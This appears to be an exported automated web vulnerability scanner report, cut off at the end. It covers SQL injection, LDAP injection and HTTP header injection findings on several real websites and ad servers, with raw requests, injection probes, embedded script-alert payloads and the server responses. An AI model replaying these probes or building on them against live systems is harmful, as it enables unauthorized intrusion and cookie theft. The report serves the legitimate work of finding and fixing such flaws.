X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=33dnlq55duskvq55o1bwound; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.67. http://www.slackbooks.com/pediatrics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /pediatrics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /pediatrics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:01:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9989

<html>
<head>
<title>Unclosed quotation mark before the character string 'pediatrics''.<br>Line 1: Incorrect syntax near 'pediatrics''.</title>
<style>
body {font-fami
...[SNIP]...

Request 2

GET /pediatrics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

2. LDAP injection  previous  next
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads da39f516a098b3de)(sn=* and da39f516a098b3de)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=da39f516a098b3de)(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_da39f516a098b3de&#41;&#40;sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=da39f516a098b3de)!(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_da39f516a098b3de&#41;!&#40;sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

2.2. http://www.youtube.com/v/VUCJyeb_3Mo [VISITOR_INFO1_LIVE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /v/VUCJyeb_3Mo

Issue detail

The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /v/VUCJyeb_3Mo?fs=1&hl=en_US&color1=0x3a3a3a&color2=0x999999 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.owneriq.com/manuals-online?4a4b1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E18871e2d338=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=*)(sn=*; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:06 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=puf24BL7mrY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:06 GMT
Set-Cookie: VISITOR_INFO1_LIVE=puf24BL7mrY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:06 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1151
Content-Type: application/x-shockwave-flash

CWS.    ...x.}U[s.F.>.a..$.u....M.N...:..bc.C.`..<.E#."..."....4O~d...o.S..{vW..4......s..`.%@.o.{    8....H....>.........P........x......W^.I.(..B..E.f....o..d..'...e.KJ.d..<.-..%......y.....e..x...........\.t...aQ@.\...#h...x....vGe..P....m.&..Q..Ea.`@-.....C..u...6..!.x..".=.k..."..1..xCC.F......43.\b....6u..?|8.:..Q......>:^........[id..>#..s...C.wzX)._.........GJ%.y......|s:....m8..1.$.o..>..t....P...3....Ri.|.S......i.!....:Q.....KJ..EajR....HJV....7..r}}.~..    ...k.6..av.M....=.Z.^.R.n.{...b.a;^.t..<...O.oR....*...#......}6.y.J.fJ..-    ...
....b_.m.\..O1/]..{@F...nu..U...\.......3...C..`....."....a.....P..9&..`...,/{.B..L.D..S....m........S.-....#..6..=m...
p.ep.j...<..cb?L..!.N..._I.$.Bt...Nn..;..l..
.RG&..L.
.4.+. S^Mb....../..R".B.g...G....B.p.T.W+<L..`...L.X..R.......,4+B.*..:W_...m8.!ne')..(..X.C6.!..E.....l..........sC..? ......wbd..1L..JU3./I.#.g.`.......|.zu.o...s6wy...."..Y..9_.h.V..Se..O.
...jZ.~    b...........J.. .....a....~..&.V...>..?..^..v'h.(.".....i.Y....;........(cl7...
.:..g^9.......Y...TN[.....}s.:u.....^....,."...I..*...~K.PQ...v.e..=B...._...V...T..z4..4...._>..x.5.KW..d3......R..q.H...%.nH'
(.. ..w..'........V..

Request 2

GET /v/VUCJyeb_3Mo?fs=1&hl=en_US&color1=0x3a3a3a&color2=0x999999 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.owneriq.com/manuals-online?4a4b1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E18871e2d338=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=*)!(sn=*; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:07 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=te6UVu5KjtQ; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:07 GMT
Set-Cookie: VISITOR_INFO1_LIVE=te6UVu5KjtQ; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:07 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1161
Content-Type: application/x-shockwave-flash

CWS.....x.}V[s.F.>.a..$.    u......m.:..4.......$y.,....."....4O~d...o.S..{v%.i......o.E.....H.p/........`\.`.o..r.=..Y97.....n??`.7..G#.1.u7...]..<w..`}..@...;.......]z.........w...B....@.:..6.?.p.m
p...9./}w...6..    ....O..:sBN.<`.....
.e".P.. ......CM......Y.5..0..U..6uz.....:V.0.Q.!h.........!.........@.L}F<...s...<.t.....    r.~}|.....%.zV......?:.A.....AH[....WR..`I\pW."i.&.b.Q..E...bIg.7..sXH....`..I..........v..U*m..........&6..w.k.}.ptt..}....I.Ry\.%.\.<..PU.....C3..tg...a4.yNz4...Q.n....Bu..........v...r..<
}...]bUm..)...N........R3.....@,....`R.+...Y@<.u..$8.z...`....9....86............E...#...G..R......l2...`.....h{...f<j.<.'033 ...c.....IA....p. .;.C..!z......^.My.w..m..0V@.l:...%...J...6<........
*.J..D&b....    X.....$...j...P.#%...~...DD]{.!...GJ.rI.Ib.,.{.j...\...tk }..fIj..........    '2...8.Z.E.).|.&>dA..T.B..m=..k.*...........V.dz.[1.....2......$....i0,.j
fB...^...j.......df<.z&...\...P....Q..O.....ZZ.~.b...t.....Rz*...4.....7."m....".&A...V...{...........$.M...UOd...h..:?;.Q...t.C.].^..kCz...5.+j.Wq)'#.f.q..>D..(N..I/H..a..E...I..*.*.~#...&.!.z....>......_...F}...~...W.|....K...Y.b....le..XU.>.C{.p...x.?7..}.G.....c..a......u..

2.3. http://www.youtube.com/v/sj4BVK0o-7w [VISITOR_INFO1_LIVE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /v/sj4BVK0o-7w

Issue detail

The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.

The payloads 4e65bf9585ccb14d)(sn=* and 4e65bf9585ccb14d)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /v/sj4BVK0o-7w HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=4e65bf9585ccb14d)(sn=*

Response 1

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:45:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=JDxEeiRoNDo; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:30 GMT
Set-Cookie: VISITOR_INFO1_LIVE=JDxEeiRoNDo; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:30 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1028
Content-Type: application/x-shockwave-flash

CWS.0...x.}U[s.F.>.a    |IB.P.....6.1".7.\..zHmL....Y.E^[H........5.....)..].@..<..........^....x...{...._S..>........S.`...g=.lz=c...r...O.ocoh\.f...;.|....-.P.....,j.F...k...D...W....W9.v6O.*.7.[...../7Zo........"....0.Y.k3..L....Z.X..a..8.N..k......5^XO..Nis..uT...f.|.{...kyf.G].'...}......I+d.~..y&.. .awR0..f.4u.k.~.1.:Gv......
T..x......,..h...."6..=...0^.2hn.=O}..m;^.8........#...#V.a>.r    (.......7`TZ&...........`Q...8.2$>C...    /.^s..X.(..\.v.I...sD....d..u..!....].G..........2...`.........w....k..fx.A%0...g].l"Z^K..5....`.mq...n;........t..B....|.O..J.!U...]L@z....5g.
*.J..T!..7x.S...1..tt.tU....">..m..C..&2..KL...:6.7."M.. ..`j.......t. c..eAZ...T.......g2..b..-...TT..S.. E..N..-6...5P..R...Q...Hz.p6=....c..    jlj......d..I......NR/..v..|....Y..eA/.......&ZUy:5&....pF_..%.9H.....,B.cO..$.s.qN."v\K...............1.....;F....k..I,.......K...B....8.zS......(}..&.........QB.....|B...hS...%.9._=....$X1-CUEWE...'T.T|.J.
.t....8|.?......Z....o.F.....C[H.Y.s....n.`G.*|...5
9.A1..[N.~....a...Gox........'..r

Request 2

GET /v/sj4BVK0o-7w HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=4e65bf9585ccb14d)!(sn=*

Response 2

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:45:31 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=Rv5nYsXJ1-I; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:31 GMT
Set-Cookie: VISITOR_INFO1_LIVE=Rv5nYsXJ1-I; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:31 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1042
Content-Type: application/x-shockwave-flash

CWS.=...x.}U[S.F..,.H\..I\ZC -m.)...2....8..1-y...Z.dI..6.......C.[...E....4M...s..;{.W.x.d.......{.f)...8....9.....Y.....M.mt.#..........g..f...qy."......E.v.Y..H..h....-...w~.-nn....-.]...V.h..jy;~.k..&.l..:[..6*.k......@(...>G!....cQ...2yTx.x..+.....q........./...fce}}e.`e..5C'..7]...,..i3..q.K.=!.c.R\gE.)..n<.`..B.5,....s.L.3.A..m..v.......J.....IT.p<...Z.W...i......i.7sZ...wg.o0..m.o.....>.....xp}.*.N..\Bfrv..x|.w.&-.......e.L.mPQ0.l.."2..Hn.ft.v.Y.Q.......e6.....".fhK.".<X,.....    8.....w..E..1.%..NT...5...ux..\.g....J8...NZ.l.Z^.(.kD...p<.uq........)....^.....@G>..S._i!..Ru..qH...;....B..THH..!}MW=..e$......UM..>..dd....}...k.(......_..4iJC....2Y..T.H........i...\E.....e...w....4.*#Q.PL}(B..T.A....H.kP..RJ..Q...Hz-w2:....'....51.r..d?.|6JF...`,..a..1..W^..<.=K....sIon.b..FVU.NM. 9#;....Y...../..D......T....qB.2q\J............    ..)..j..;$.Iy-.h7%.h.=+7.....4)......X...?..u.....d..?Qc...=.P9.b.6=...C...b....)._<L...$T1-CUEWE..$'T.Tr.V....i....i...;-......s'.}..C(.W.mn0.Z.KW$.t-.-1..>..4.8k#.....5;..c..Y..G......F........

3. HTTP header injection  previous  next
There are 29 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/ad/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9bf0b%0d%0ad1d5184d06f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9bf0b%0d%0ad1d5184d06f/N553.158901.DATAXU/B4970757.11 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9bf0b
d1d5184d06f
/N553.158901.DATAXU/B4970757.11:
Date: Sat, 05 Feb 2011 21:50:27 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/ad/N815.286991.WEBBUYERSGUIDE/B5173264 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.286991.WEBBUYERSGUIDE/B5173264

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 843f5%0d%0acb11c15fe77 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /843f5%0d%0acb11c15fe77/N815.286991.WEBBUYERSGUIDE/B5173264;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/843f5
cb11c15fe77
/N815.286991.WEBBUYERSGUIDE/B5173264%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://ad.doubleclick.net/ad/N815.zdenterprise/B4597436.59 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B4597436.59

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1032c%0d%0a72456777471 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1032c%0d%0a72456777471/N815.zdenterprise/B4597436.59;sz=1x1;ord=1288981822554? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1032c
72456777471
/N815.zdenterprise/B4597436.59%3Bsz%3D1x1%3Bord%3D1288981822554:
Date: Sun, 06 Feb 2011 13:22:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://ad.doubleclick.net/ad/N815.zdenterprise/B4822628.25 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B4822628.25

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b0ee%0d%0a76dcc98cc56 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b0ee%0d%0a76dcc98cc56/N815.zdenterprise/B4822628.25;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b0ee
76dcc98cc56
/N815.zdenterprise/B4822628.25%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.5. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.14 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B5069510.14

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5dc39%0d%0a0f8fde46ef2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5dc39%0d%0a0f8fde46ef2/N815.zdenterprise/B5069510.14;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
